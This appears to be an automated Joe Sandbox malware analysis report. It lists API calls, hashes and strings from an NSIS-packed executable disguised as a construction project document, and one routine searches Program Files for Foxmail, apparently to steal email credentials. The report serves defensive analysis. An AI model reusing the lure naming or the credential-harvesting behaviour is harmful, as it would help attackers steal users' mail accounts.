                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsbA563.tmp
                                                                                                                          • API String ID: 3213498283-17658044
                                                                                                                          • Opcode ID: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                                                                                          • Instruction ID: 5ad67665fffd931dad9daf24cd7e721830b1e1cd98268fde7792f953d01aa38a
                                                                                                                          • Opcode Fuzzy Hash: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                                                                                          • Instruction Fuzzy Hash: 60F09611B40A1196DF3176544CD5A7776B8EB54350F14823BE702B71C1D3F84C818FEA
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004059DD
                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004059E7
                                                                                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059F9
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3081826266
                                                                                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                          • Instruction ID: 7fac2ab44bb530718b2284b157b2a7f0092c6bde3eeb611d4a5a20073ea11bc0
                                                                                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                          • Instruction Fuzzy Hash: AAD05E61101921AAC21267458C00D9F629CEE86340340042AF101B30A1C77C1D428BFE
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404258612-0
                                                                                                                          • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                                          • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                                                                                          • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                                          • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405A90
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405B38
                                                                                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405B48
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsbA563.tmp
                                                                                                                          • API String ID: 3248276644-17658044
                                                                                                                          • Opcode ID: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                                                                                          • Instruction ID: befbdd5a087c2980586ea2edfffbf9f3f516deffcd0f82c81bc74a8a64b8095a
                                                                                                                          • Opcode Fuzzy Hash: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                                                                                          • Instruction Fuzzy Hash: 97F0D125208D5259D622323A1C49AAF3954CF82324B59063FB850B22D1DA3CA9439DBE
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 004051D7
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                                          • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                                                                                          • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                                          • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,00403861,74DF3420,0040366C,?), ref: 004038A4
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 1100898210-3081826266
                                                                                                                          • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                                          • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                                                                                          • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                                          • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405A29
                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405A39
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-224404859
                                                                                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                          • Instruction ID: 70c70b289df7ad335b0e987d4c8d51b2e295f307612c2b5534f84bbf363d52d8
                                                                                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                          • Instruction Fuzzy Hash: EFD05EA25019209BD322A704DC40D9FA7ACEF513007454866F401A31A0D3785D818EA9
                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                          • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                                                                                          • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                                                                                          • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:1.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0.5%
                                                                                                                          Total number of Nodes:213
                                                                                                                          Total number of Limit Nodes:5

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 332B1137
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1151
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B115C
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B116D
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B117C
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1193
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 332B11D0
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 332B11DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1083526818-0
                                                                                                                          • Opcode ID: b921de05a7f91cc8ca918e329d1566bf1c0ba254fbc38d2a83a7b9ae5f555f4e
                                                                                                                          • Instruction ID: 7091c4ed7f00ec8be3184de602fc0cf00c1cb522b6b1ce954837553bf64aa633
                                                                                                                          • Opcode Fuzzy Hash: b921de05a7f91cc8ca918e329d1566bf1c0ba254fbc38d2a83a7b9ae5f555f4e
                                                                                                                          • Instruction Fuzzy Hash: 4C2193729043096BDB10EA64DC4CFDB7BECEF84754F040D2AB968D3190EB70D6458796

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,?), ref: 332B1434
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 332B1137
                                                                                                                            • Part of subcall function 332B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1151
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B115C
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B116D
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B117C
                                                                                                                            • Part of subcall function 332B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1193
                                                                                                                            • Part of subcall function 332B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 332B11D0
                                                                                                                            • Part of subcall function 332B10F1: FindClose.KERNEL32(00000000), ref: 332B11DB
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 332B14C5
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 332B14E0
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B150F
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B1521
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B1547
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B1553
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B1579
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B1585
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B15AB
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B15B7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                          • API String ID: 672098462-2938083778

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(332BC7DD), ref: 332BC7E6
                                                                                                                          • GetModuleHandleA.KERNEL32(?,332BC7DD), ref: 332BC838
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 332BC860
                                                                                                                            • Part of subcall function 332BC803: GetProcAddress.KERNEL32(00000000,332BC7F4), ref: 332BC804
                                                                                                                            • Part of subcall function 332BC803: VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC816
                                                                                                                            • Part of subcall function 332BC803: VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC82A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0

                                                                                                                          Control-flow Graph

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetProcAddress.KERNEL32(00000000,332BC7F4), ref: 332BC804
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC816
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC82A
                                                                                                                          • GetModuleHandleA.KERNEL32(?,332BC7DD), ref: 332BC838
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 332BC860
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2152742572-0

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404C1D
                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                                                                                          • SetWindowLongW.USER32(?,?,004051A8), ref: 00404C49
                                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C5D
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404CA3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404DE1
                                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DEF
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F77
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F9B
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405131
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405191
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
